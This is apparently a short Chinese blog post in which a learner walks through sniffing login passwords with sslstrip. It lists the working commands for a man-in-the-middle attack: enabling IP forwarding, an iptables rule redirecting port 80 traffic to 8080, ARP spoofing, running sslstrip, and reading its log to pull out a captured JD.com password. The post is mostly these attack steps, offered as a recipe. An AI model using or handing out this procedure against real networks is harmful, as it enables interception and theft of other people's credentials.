利用sslstrip嗅探http密码

2018-02-17  本文已影响0人  Fisheepnix

具体操作的截图我只截了几张,因为弄过很多次了,所以就不再重复了

1. echo 1 >/proc/sys/net/ipv4/ip_forward

(这条命令的意思我百度了一下好像是开启ip转发功能)

2. 配置路由表,把80端口的数据传送到8080端口,也就是SSL欺骗需要监听的端口

具体指令:iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080(这个我背不到,一直都是复制的)

3. 开始arp欺骗

具体指令见  使用arp欺骗造成目标断网  那一节截取图片

4. 开始监听:sslstrip -l 8080

当时这步是成功了的,我也用的京东当例子,https变成了http

5. 在浏览器内登录账号以及密码

这个也没截图,只有最后的几张截图(忘了)

6. 打开终端输入:cat sslstrip.log

然后就出来

这么大一堆。。。

艰难的定位到了我账号的地方,有两个。。

前面那个后面没有东西,所以应该是第二个的位置,这个后面是loginpwd,所以应该是没错

(其实这应该是一节疑问大全。。。。)

上一篇 下一篇

猜你喜欢

热点阅读